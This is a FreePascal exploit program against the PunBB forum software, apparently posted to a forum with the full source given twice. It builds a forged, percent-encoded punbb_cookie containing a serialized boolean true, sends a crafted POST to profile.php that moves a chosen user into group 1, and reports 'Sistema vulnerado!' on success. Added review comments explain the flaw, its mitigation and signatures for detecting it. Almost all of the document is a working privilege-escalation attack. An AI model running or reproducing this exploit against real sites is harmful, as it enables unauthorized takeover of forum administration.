:Código:
// freepascal
program punbb;
uses winsock,sysutils,crt;
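function conectar(var sock: TSocket; serv,port:string): byte;
// Resolves `serv`, creates a TCP socket in `sock` and connects it to `port`.
//
// Result codes (unchanged for callers):
//   0 = connected
//   1 = host name could not be resolved (no socket was created)
//   2 = socket() failed (no socket was created)
//   3 = connect() failed (`sock` is open; the caller is expected to close it)
//
// Side effect: writes ' ip: <address>' to standard output once the name resolves.
// `port` must be a decimal number; strtoint raises a conversion error otherwise.
var
  host: phostent;
  info: TSockAddrIn;
  aux: pchar;
begin
  // gethostbyname needs a NUL-terminated C string, so copy the Pascal string.
  aux:= stralloc(length(serv)+1);
  strpcopy(aux,serv);
  host:= gethostbyname(aux);
  // The copy is only needed for the lookup. Releasing it here fixes the leak
  // the original had on both early-exit paths below.
  strdispose(aux);
  if host=nil then
  begin
    conectar:= 1;
    Exit;
  end;
  sock:= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  // socket() reports failure as INVALID_SOCKET; SOCKET_ERROR is the failure
  // value of calls such as connect/send/recv, not of socket().
  if sock=INVALID_SOCKET then
  begin
    conectar:= 2;
    Exit;
  end;
  // Zero the whole address record so the padding bytes are not stack garbage.
  fillchar(info,SizeOf(info),0);
  info.sin_family:= AF_INET;
  info.sin_addr:= PInAddr(host^.h_addr[0])^;
  Write(' ip: ',inet_ntoa(info.sin_addr));
  info.sin_port:= htons(strtoint(port));
  if connect(sock,info,SizeOf(TSockAddr))=SOCKET_ERROR then
    conectar:= 3
  else
    conectar:= 0;
end;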
// Review summary (grounded in the code below): command-line client that opens a
// TCP connection to <host>:80 and sends one crafted POST to PunBB's profile.php
// asking for user <idusuario> to be placed in group 1. It authenticates with a
// hand-built punbb_cookie for <idadmin> rather than a real session.
//
// Defensive notes:
//  - The cookie is a PHP-serialized two-element array whose second element is
//    the boolean true (b:1). Presumably the affected server unserializes the
//    cookie and compares that element loosely against a stored credential
//    value -- confirm against the vendor advisory.
//  - Server-side mitigation: apply the vendor fix, do not unserialize()
//    client-supplied cookies, compare credentials with type-strict operators,
//    and integrity-protect the cookie (e.g. with an HMAC).
//  - Detection: the request is HTTP/1.0 with bare LF line endings, targets
//    profile.php?section=admin with action=foo, has a fixed Content-Length of
//    51, and carries a punbb_cookie in which every byte is percent-encoded.
var
// Winsock start-up data filled in by wsastartup.
dato: wsadata;
// Socket used for the single HTTP exchange.
misock: tsocket;
// cok = raw cookie value, cokh = the same value with every byte percent-encoded.
cok,cokh: string;
// post = request template, fpost = formatted request, resp = receive buffer.
fpost,
post,
resp:pchar;
// Result code returned by conectar.
res: integer;
i: word;
// Argument for ioctlsocket(FIONBIO): non-zero switches to non-blocking mode.
activar: cardinal;
begin;
// Four positional arguments are required: host, forum path, the user id put
// into the cookie, and the user id whose group membership is to be changed.
if paramcount<4 then
begin
WriteLn('- Faltan parametros');
WriteLn('- Uso: punbb <host> <ruta> <idadmin> <idusuario>');
WriteLn('- Ej.: punbb www.ejemplo.com /punbb/ 2 20');
Exit;
end;
// Requests Winsock 2.2. NOTE(review): the return value is not checked.
wsastartup($0202,dato);
Write('- Conectando');
// The port is hard-coded to 80 (plain HTTP).
res:= conectar(misock,ParamStr(1),'80');
if res<>0 then
begin
// Result 3 means the socket was created but connect failed, so it is closed here.
if res=3 then closesocket(misock);
WriteLn(' > Error!');
end
else
begin
WriteLn(' > OK!');
// Serialized array: element 0 is the <idadmin> argument as a string, element 1
// is the boolean true. No secret value is included anywhere in the cookie.
cok:= 'a:2:{i:0;s:'+inttostr(length(ParamStr(3)))+':"'+ParamStr(3)+'";i:1;b:1;}';
cokh:= '';
// Percent-encode every byte of the cookie value (%XX per character).
for i:= length(cok) downto 1 do
cokh:='%'+inttohex(ord(cok[i]),2)+cokh;
// Request template. Lines end in LF only (#10), not CRLF, and the protocol is
// HTTP/1.0. The body asks to save group_id=1 for the user given in the id query
// parameter; group 1 is presumably the administrators group -- confirm.
post:= 'POST %sprofile.php?section=admin&id=%s&action=foo HTTP/1.0'+#10+
'Host: %s'+#10+
'Referer: http://%s%sprofile.php?section=admin&id=%s'+#10+
'Cookie: punbb_cookie=%s'+#10+
'Content-Type: application/x-www-form-urlencoded'+#10+
'Content-Length: 51'+#10+#10+
'form_sent=1&group_id=1&update_group_membership=Save'+#10+#10;
// NOTE(review): the output buffer is the template length plus 1024 bytes; the
// command-line arguments substituted into it are not length-checked.
fpost:= stralloc(strlen(post)+1024);
// Substitution order: path, target id, host (Host header), host, path, target id
// (Referer header), encoded cookie.
strfmt(fpost,post,[ParamStr(2),ParamStr(4),ParamStr(1),
ParamStr(1),ParamStr(2),ParamStr(4),cokh]);
Write('- Enviando POST');
if send(misock,fpost^,strlen(fpost),0)=SOCKET_ERROR then WriteLn(' > Error!')
else
begin
WriteLn(' > OK!');
// NOTE(review): 2096 bytes are allocated but recv below is told the buffer holds
// 4096, so a larger reply writes past the allocation. The buffer is also not
// cleared or NUL-terminated before strpos reads it.
resp:= stralloc(2096);
WriteLn('- Esperando respuesta (presione cualquier tecla para cancelar)');
activar:= 1;
// Switch the socket to non-blocking mode so the loop below can poll the keyboard.
ioctlsocket(misock,FIONBIO,activar);
// Busy-wait until a key is pressed or recv returns anything other than
// "would block". Only the result of that single recv call is inspected.
while (not keypressed) and ((recv(misock,resp^,4096,0)=SOCKET_ERROR) and (wsagetlasterror=WSAEWOULDBLOCK)) do;
// Success is inferred purely from this confirmation text appearing in the reply.
if strpos(resp,'Group membership saved')<>nil then
WriteLn('- Sistema vulnerado!')
else
WriteLn('- No se pudo vulnerar el sistema!');
strdispose(resp);
end;//if send
strdispose(fpost);
// NOTE(review): misock is never closed on this (connected) path.
end;//if conectar
wsacleanup;
end.
Fuente:
program punbb;
uses winsock,sysutils,crt;
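function conectar(var sock: TSocket; serv,port:string): byte;
// Resolves `serv`, creates a TCP socket in `sock` and connects it to `port`.
//
// Result codes (unchanged for callers):
//   0 = connected
//   1 = host name could not be resolved (no socket was created)
//   2 = socket() failed (no socket was created)
//   3 = connect() failed (`sock` is open; the caller is expected to close it)
//
// Side effect: writes ' ip: <address>' to standard output once the name resolves.
// `port` must be a decimal number; strtoint raises a conversion error otherwise.
var
  host: phostent;
  info: TSockAddrIn;
  aux: pchar;
begin
  // gethostbyname needs a NUL-terminated C string, so copy the Pascal string.
  aux:= stralloc(length(serv)+1);
  strpcopy(aux,serv);
  host:= gethostbyname(aux);
  // The copy is only needed for the lookup. Releasing it here fixes the leak
  // the original had on both early-exit paths below.
  strdispose(aux);
  if host=nil then
  begin
    conectar:= 1;
    Exit;
  end;
  sock:= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  // socket() reports failure as INVALID_SOCKET; SOCKET_ERROR is the failure
  // value of calls such as connect/send/recv, not of socket().
  if sock=INVALID_SOCKET then
  begin
    conectar:= 2;
    Exit;
  end;
  // Zero the whole address record so the padding bytes are not stack garbage.
  fillchar(info,SizeOf(info),0);
  info.sin_family:= AF_INET;
  info.sin_addr:= PInAddr(host^.h_addr[0])^;
  Write(' ip: ',inet_ntoa(info.sin_addr));
  info.sin_port:= htons(strtoint(port));
  if connect(sock,info,SizeOf(TSockAddr))=SOCKET_ERROR then
    conectar:= 3
  else
    conectar:= 0;
end;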
// Review summary (grounded in the code below): command-line client that opens a
// TCP connection to <host>:80 and sends one crafted POST to PunBB's profile.php
// asking for user <idusuario> to be placed in group 1. It authenticates with a
// hand-built punbb_cookie for <idadmin> rather than a real session.
//
// Defensive notes:
//  - The cookie is a PHP-serialized two-element array whose second element is
//    the boolean true (b:1). Presumably the affected server unserializes the
//    cookie and compares that element loosely against a stored credential
//    value -- confirm against the vendor advisory.
//  - Server-side mitigation: apply the vendor fix, do not unserialize()
//    client-supplied cookies, compare credentials with type-strict operators,
//    and integrity-protect the cookie (e.g. with an HMAC).
//  - Detection: the request is HTTP/1.0 with bare LF line endings, targets
//    profile.php?section=admin with action=foo, has a fixed Content-Length of
//    51, and carries a punbb_cookie in which every byte is percent-encoded.
var
// Winsock start-up data filled in by wsastartup.
dato: wsadata;
// Socket used for the single HTTP exchange.
misock: tsocket;
// cok = raw cookie value, cokh = the same value with every byte percent-encoded.
cok,cokh: string;
// post = request template, fpost = formatted request, resp = receive buffer.
fpost,
post,
resp:pchar;
// Result code returned by conectar.
res: integer;
i: word;
// Argument for ioctlsocket(FIONBIO): non-zero switches to non-blocking mode.
activar: cardinal;
begin;
// Four positional arguments are required: host, forum path, the user id put
// into the cookie, and the user id whose group membership is to be changed.
if paramcount<4 then
begin
WriteLn('- Faltan parametros');
WriteLn('- Uso: punbb <host> <ruta> <idadmin> <idusuario>');
WriteLn('- Ej.: punbb www.ejemplo.com /punbb/ 2 20');
Exit;
end;
// Requests Winsock 2.2. NOTE(review): the return value is not checked.
wsastartup($0202,dato);
Write('- Conectando');
// The port is hard-coded to 80 (plain HTTP).
res:= conectar(misock,ParamStr(1),'80');
if res<>0 then
begin
// Result 3 means the socket was created but connect failed, so it is closed here.
if res=3 then closesocket(misock);
WriteLn(' > Error!');
end
else
begin
WriteLn(' > OK!');
// Serialized array: element 0 is the <idadmin> argument as a string, element 1
// is the boolean true. No secret value is included anywhere in the cookie.
cok:= 'a:2:{i:0;s:'+inttostr(length(ParamStr(3)))+':"'+ParamStr(3)+'";i:1;b:1;}';
cokh:= '';
// Percent-encode every byte of the cookie value (%XX per character).
for i:= length(cok) downto 1 do
cokh:='%'+inttohex(ord(cok[i]),2)+cokh;
// Request template. Lines end in LF only (#10), not CRLF, and the protocol is
// HTTP/1.0. The body asks to save group_id=1 for the user given in the id query
// parameter; group 1 is presumably the administrators group -- confirm.
post:= 'POST %sprofile.php?section=admin&id=%s&action=foo HTTP/1.0'+#10+
'Host: %s'+#10+
'Referer: http://%s%sprofile.php?section=admin&id=%s'+#10+
'Cookie: punbb_cookie=%s'+#10+
'Content-Type: application/x-www-form-urlencoded'+#10+
'Content-Length: 51'+#10+#10+
'form_sent=1&group_id=1&update_group_membership=Save'+#10+#10;
// NOTE(review): the output buffer is the template length plus 1024 bytes; the
// command-line arguments substituted into it are not length-checked.
fpost:= stralloc(strlen(post)+1024);
// Substitution order: path, target id, host (Host header), host, path, target id
// (Referer header), encoded cookie.
strfmt(fpost,post,[ParamStr(2),ParamStr(4),ParamStr(1),
ParamStr(1),ParamStr(2),ParamStr(4),cokh]);
Write('- Enviando POST');
if send(misock,fpost^,strlen(fpost),0)=SOCKET_ERROR then WriteLn(' > Error!')
else
begin
WriteLn(' > OK!');
// NOTE(review): 2096 bytes are allocated but recv below is told the buffer holds
// 4096, so a larger reply writes past the allocation. The buffer is also not
// cleared or NUL-terminated before strpos reads it.
resp:= stralloc(2096);
WriteLn('- Esperando respuesta (presione cualquier tecla para cancelar)');
activar:= 1;
// Switch the socket to non-blocking mode so the loop below can poll the keyboard.
ioctlsocket(misock,FIONBIO,activar);
// Busy-wait until a key is pressed or recv returns anything other than
// "would block". Only the result of that single recv call is inspected.
while (not keypressed) and ((recv(misock,resp^,4096,0)=SOCKET_ERROR) and (wsagetlasterror=WSAEWOULDBLOCK)) do;
// Success is inferred purely from this confirmation text appearing in the reply.
if strpos(resp,'Group membership saved')<>nil then
WriteLn('- Sistema vulnerado!')
else
WriteLn('- No se pudo vulnerar el sistema!');
strdispose(resp);
end;//if send
strdispose(fpost);
// NOTE(review): misock is never closed on this (connected) path.
end;//if conectar
wsacleanup;
end.
http://www.frsirt.com. bytes










